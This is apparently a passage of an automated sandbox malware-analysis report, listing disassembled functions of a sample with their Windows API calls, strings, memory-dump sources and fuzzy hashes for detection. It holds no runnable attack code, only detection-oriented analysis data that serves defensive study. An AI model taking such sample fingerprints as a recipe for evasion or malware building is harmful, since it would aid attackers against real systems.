                                                                                                                                                        Function 00AFA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B2DBF0,00000000,?,?,?,?), ref: 00AFA4E6
                                                                                                                                                        • GetWindowLongW.USER32 ref: 00AFA503
                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AFA513
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Long
                                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                                        • Opcode ID: 4f4c4b33a262bcfa7a36344cda981052f7a606338ad81f954eeb301867bd33ba
                                                                                                                                                        • Instruction ID: 5d20b04675314faccf8c610c182e9c8c4623ccead32a42994517bfec790a87ed
                                                                                                                                                        • Opcode Fuzzy Hash: 4f4c4b33a262bcfa7a36344cda981052f7a606338ad81f954eeb301867bd33ba
                                                                                                                                                        • Instruction Fuzzy Hash: D531B271240609AFDB218F78CC45BE67BA9EF59334F248715F979932E0D770E8509B50
                                                                                                                                                        Function 00AFA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AFA74F
                                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AFA75D
                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AFA764
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                                        • Opcode ID: e20046586cc244c5ef61237551334bcfeca4d02835cab476184d3bc65a0c845b
                                                                                                                                                        • Instruction ID: 33793160c703fbcd96ad1ac5cc824f9412307aafe6515a26084339c58f0239eb
                                                                                                                                                        • Opcode Fuzzy Hash: e20046586cc244c5ef61237551334bcfeca4d02835cab476184d3bc65a0c845b
                                                                                                                                                        • Instruction Fuzzy Hash: 182151B5A00209AFDB10EF68CCC1EB737ADEB5A394B040459FA05D7351CB70EC11DA61
                                                                                                                                                        Function 00AF97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AF983D
                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AF984D
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AF9872
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                                        • String ID: Listbox
                                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                                        • Opcode ID: 8abb06159dfa0a7f2a96e5ce5281da3e18a9b5d6c2d102e7991a2a1525d1c204
                                                                                                                                                        • Instruction ID: 22cb7ef7a75684f7d4ca86d3036741c910300010f078820616027ae9ba73bf49
                                                                                                                                                        • Opcode Fuzzy Hash: 8abb06159dfa0a7f2a96e5ce5281da3e18a9b5d6c2d102e7991a2a1525d1c204
                                                                                                                                                        • Instruction Fuzzy Hash: 2E21A73161021CBFEF119F94CC85FBB3BAAEF8A794F018124FA055B190CA719C5187E0
                                                                                                                                                        Function 00AFA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AFA27B
                                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AFA290
                                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AFA29D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                                        • Opcode ID: 6ef2dc3bf1e6ba8d15d3d5f5e16f764dacaf0be945f3b4bf10532457bfac30fa
                                                                                                                                                        • Instruction ID: 30bb8ad92d9f038a0e6b613a05622f9b6baf4b1eb5025f6db86e39cae6a600b4
                                                                                                                                                        • Opcode Fuzzy Hash: 6ef2dc3bf1e6ba8d15d3d5f5e16f764dacaf0be945f3b4bf10532457bfac30fa
                                                                                                                                                        • Instruction Fuzzy Hash: 2611E771240308BAEB205FA5CC46FE73BA8EF99B54F114118FB45970A0D6729851DB60
                                                                                                                                                        Function 00AB2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00AB2F11,00000000), ref: 00AB2F79
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AB2F80
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                                                        • Opcode ID: 877b2c39e35faf0200fad7a64b7f5755e6c1f75d9b0c89cde034fbff347f9b86
                                                                                                                                                        • Instruction ID: 059dc18c693675b769ba6ff337a84623e1effef0b9e3187e8ef2cfb695228cf1
                                                                                                                                                        • Opcode Fuzzy Hash: 877b2c39e35faf0200fad7a64b7f5755e6c1f75d9b0c89cde034fbff347f9b86
                                                                                                                                                        • Instruction Fuzzy Hash: E1E01A746E4702AAEB106F70EC49BD53AA8BB01746F5040A4B202F71B0CFB54050DF05
                                                                                                                                                        Function 00AB3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AB2F4E), ref: 00AB304E
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AB3055
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                                                        • API String ID: 2574300362-2819208100
                                                                                                                                                        • Opcode ID: c6d6d1f95668f8daa072e552bfd467ceb07458cea07000f190d2f562e25dd2a4
                                                                                                                                                        • Instruction ID: 0cd3248596322eacec370be04b585ced21d1f0d770cb4a26f6b6310533e7fc42
                                                                                                                                                        • Opcode Fuzzy Hash: c6d6d1f95668f8daa072e552bfd467ceb07458cea07000f190d2f562e25dd2a4
                                                                                                                                                        • Instruction Fuzzy Hash: 6CE0B6746A8700ABEB20BF71ED0DB953AA8BB00703F500098F609F31B1DFB845408B16
                                                                                                                                                        Function 00B0BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LocalTime__swprintf
                                                                                                                                                        • String ID: %.3d$WIN_XPe
                                                                                                                                                        • API String ID: 2070861257-2409531811
                                                                                                                                                        • Opcode ID: dc9c8402c99038c2bc742d0f966992897fef63e656a7c74a3681ceea044deca3
                                                                                                                                                        • Instruction ID: 1d831871766cc5807bab00bf3217e72491ee7599ebbde197908d9b1d43305439
                                                                                                                                                        • Opcode Fuzzy Hash: dc9c8402c99038c2bc742d0f966992897fef63e656a7c74a3681ceea044deca3
                                                                                                                                                        • Instruction Fuzzy Hash: B4E01271D0801CFACB14C6908D86EFA77FCAB08300F5084D3B91692095DB359B54AB21
                                                                                                                                                        Function 00AF20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AF20EC,?,00AEF751), ref: 00AF2104
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00AF2116
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-399901964
                                                                                                                                                        • Opcode ID: 02ed7ea642128873aeba5e1b500ddf41cad84533e170bcbb78589a1c87255765
                                                                                                                                                        • Instruction ID: d5aba54f2a2ffcf78b1d86b880ffd7c03e027ce06d8d16e83497ff280c422e08
                                                                                                                                                        • Opcode Fuzzy Hash: 02ed7ea642128873aeba5e1b500ddf41cad84533e170bcbb78589a1c87255765
                                                                                                                                                        • Instruction Fuzzy Hash: 6DD0A7744403129FD7205FA5E80D75237E8EF04300B008469F749E2168DB70C480CB14
                                                                                                                                                        Function 00AAE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE69C,?,00AAE43F), ref: 00AAE6B4
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AAE6C6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                                                        • Opcode ID: e302f65b495798f5b3ae1b6ac37af5aeead3143ee139ffc8b98d252c2e10877e
                                                                                                                                                        • Instruction ID: 4b26311fe15767715f5a078f2f62067d53928b817966ac081df591369fbb5726
                                                                                                                                                        • Opcode Fuzzy Hash: e302f65b495798f5b3ae1b6ac37af5aeead3143ee139ffc8b98d252c2e10877e
                                                                                                                                                        • Instruction Fuzzy Hash: 48D0A7744803129FD7219F31E80874237E4AFA8305B409859F485E31B4DB70C4809610
                                                                                                                                                        Function 00AAE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE6D9,0000000C,00AAE55B,00B2DC28,?,?), ref: 00AAE6F1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00AAE703
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-3024904723
                                                                                                                                                        • Opcode ID: bd1e4a9747104594c8f6f7b5d2ca3f46f4a71e01decd7e82903dc2b65994afc9
                                                                                                                                                        • Instruction ID: 8a88891aedf7b20ed79b628c40a6a8c7cf8aad2e0666ee4b8691d2a7e0ab8105
                                                                                                                                                        • Opcode Fuzzy Hash: bd1e4a9747104594c8f6f7b5d2ca3f46f4a71e01decd7e82903dc2b65994afc9
                                                                                                                                                        • Instruction Fuzzy Hash: 21D0A974480322AFDB24AF22E84C7833BE8BF05300B40846AF495E32A0DBB0C8809A10
                                                                                                                                                        Function 00AEEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AEEBAF,?,00AEEAAC), ref: 00AEEBC7
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AEEBD9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-1816364905
